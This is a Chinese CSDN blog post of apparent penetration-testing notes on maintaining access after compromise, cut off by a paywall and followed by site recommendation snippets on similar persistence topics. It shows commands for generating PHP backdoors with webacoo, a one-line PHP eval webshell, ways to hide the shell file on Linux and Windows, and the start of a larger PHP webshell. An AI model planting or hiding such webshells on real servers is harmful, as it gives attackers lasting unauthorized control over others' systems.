内网渗透之权限维持

最新推荐文章于 2024-04-14 17:05:10 发布
最新推荐文章于 2024-04-14 17:05:10 发布
阅读量1.8k 收藏 10
点赞数 2
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34844644/article/details/106627390
版权

权限维持

1介绍

可以持续性攻击(apt)
后门(backdoor),通过某个端口,或者协议等。
持久 系统重启以后还能访问
权限维持 = 后门+持久
通过后门来进行持久

2普通权限

@TOC

1web后门

1webcoo

kali linux生成php
webacoo -g -o /1.php
在这里插入图片描述
测试
webacoo -t -u http://ip/1.php在这里插入图片描述

2weely后门

weely生成木马
在这里插入图片描述
测试
在这里插入图片描述
在这里插入图片描述

3普通php

web后门(通过80端口,一般的网站渗透,框架漏洞利用)
一句话 <?php @eval($_POST[123]);?>
隐藏一句话mv shell.php .shell.php,linux一般人喜欢用ls 而不是ls -al
windows 命令则是 attrib +s +h shell.php
在这里插入图片描述
webshell
在这里插入图片描述
webshell优点
1正常访问,一般不会被防火墙给强奸
2免杀容易,容易绕过
3功能强大,方便进行一大波操作
附上网上找到的五行代码php大马,大马方便进行内网漫游。

<?php
$password='admin';//登录密码
//本次更新:体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。
//功能特色࿱
最低0.47元/天 解锁文章
welcome.php
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透-Linux权限维持
lza20001103的博客
09-26 2356
Linux权限维持 文章目录Linux权限维持前言ssh后门Setuid and SetgidLinux隐藏技术后记 前言 前面讲解了window中的权限维持的方法,本期给大家讲解一下Linux中权限维持的方法,内容比较少,大家还是能掌握尽量都掌握吧,在以后的工作渗透中,也是需要用上的。 ssh后门 过滤 ps -elf |grep 12345 监听端口 nc -lvvp 123 查看端口 netstat -anlp|grep 12345 (1)ssh后门(脚本内容)(192.168.231.134) #!
ensp加kali实现arp欺骗攻击
04-21
使用arpspoof实现流量窃取与断攻击
渗透——权限维持
cldimd的博客
03-23 1178
一、权限维持: 当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了。 由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门来维持权限,达到持续控制的目的。 二、获取windows系统登陆账号: 系统登陆账号存储位置:C:\Windows\System32...
渗透-windows权限维持的方法
lza20001103的博客
04-14 1182
渗透-windows权限维持的方法
渗透 - 权限维持 - Linux
weixin_30855099的博客
08-22 288
1.预加载型动态链接库后门2.strace后门3.ssh后门4.OpnenSSH后门5.sshd软链接后门6.wrapper后门7.SUID后门8.inetd服务后门9.协议后门10.vim后门11.PAM后门12.进程注入13.Rootkit 转载于:https://www.cnblogs.com/AtesetEnginner/p/11397184.html...
[内渗透]—权限维持
Sentiment的博客
12-16 885
当拿到域控权限后,使用mimikatz可以注入Skeleon Key,将 Skeleton Key 注入域控制器的 lsass.exe 进程,这样会在域内的所有账号中添加一个 Skeleton Key,而这个key是自己设定的所以可以随时共享访问。PS:由于注入到lsass.exe进程中,所以每次关机后就不存在了,但一般在真正的域环境中,域控在很长一段时间内是不会重启的,因此可以作为权限维持的一种方式。
渗透权限维持-域控后门-SSP&HOOK&DSRM&SID&Skeleton-Key
m0_62207170的博客
05-14 710
渗透权限维持-域控后门-SSP&HOOK&DSRM&SID&Skeleton-Key
渗透之windows权限维持
07-18
【标题】"内渗透之windows权限维持"揭示了络安全领域的一个重要话题——在Windows操作系统环境中如何保持已获得的权限,以便进行深度的系统分析或恶意活动。这通常涉及到对系统内部工作原理的理解,以及利用特定...
经验之绕过杀软之MOF的利用
11-25
MOF(Managed Object Format)文件在这种场景下被利用,主要用于权限维持和提权。MOF是WMI(Windows Management Instrumentation)数据库中类和类实例的原始表示,它允许用户创建和注册提供程序、事件类别和事件。...
渗透思路.pdf
最新发布
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
Linux内渗透.doc
07-08
本文将从拿到一个 Linux shell 开始,介绍 Linux 内渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 权限维持、Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...
络安全-渗透中的权限维持-杨晓成-360
02-01
络安全-渗透中的权限维持-杨晓成-360-下载版 权限维持 Windows相关 Linux相关 中间件 webshell
渗透完全技巧.pdf
10-03
拥有本地管理员权限 获取密码 绕过LSA防护策略读取密码 token窃取 查看本地存储的所有密码 卷影拷贝(获取域控所有hash) dpapi解密 2.内信息收集 本机信息收集 8.获取当前用户密码 Windows Linux 浏览器 Navicat...
渗透-域内的权限维持
lza20001103的博客
10-01 998
域内的权限维持 文章目录域内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内的权限维持权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
渗透-linux权限维持
lza20001103的博客
08-25 591
渗透-linux权限维持 文章目录内渗透-linux权限维持添加用户存在交互的shell不允许uid=0的⽤户远程登录(高版本)没交互shell⽆回显添加Linux账户密码使用linux的perl直接写入/etc/passwd隐藏后门技巧修改文件属性文件锁定历史操作命令隐藏文件进程隐藏rookit后门ReptilePAMssh公私钥免密登录ssh秘钥计划任务 反弹shell 添加用户 UID=0是最高权限的用户,有时候不能被远程登录,可以创建一个普通用户。 正常可以通过 “id” 来查看当前的用户的U
渗透测试:域内权限维持思路总结
qq_45521281的博客
02-21 1696
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录Windows 操作系统常见持久性后门Windows系统隐藏账户Shift 粘滞键后门(1)手动制作(2)Empire 下的利用注册表键后门(1)手动制作(2)Metasploit 下的利用(3)Empire 下的利用Windows 计划任务后门(1)利用 at 命令(2)利用 schtasks 命令(3)利用SharPersist工.
渗透系列:权限维持方法小结
闵行小鱼塘
08-02 2341
小结下权限维持方法
安全--权限维持
weixin_58782362的博客
11-05 815
C:\Windows\System32\mimilsa.log 记录登录的账号密码(前提条件是需要在线切换用户,且服务器不重启)1、mimilib.dll 传到目标域控的c:\windows\system32\目录下。c:\windows\system32\kiwissp.log 记录账号密码文件。方法一:但如果域控制器,被注入的内存的伪造的ssp将会丢失。域环境的权限维持、单机版的权限维持、web权限维持。使用此方法即使系统重启,也不会影响到持久化的效果。权限维持:为攻击者创造出稳定的输出。
渗透流程与思路和工具讲解
04-10
渗透流程与思路和工具讲解是一门深入研究的信息安全技术,它关注的是如何通过合法或非法手段评估内部络的安全状况,以发现潜在漏洞。以下是关于内渗透的核心知识点: 1. **内渗透流程**: - **阶段一:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值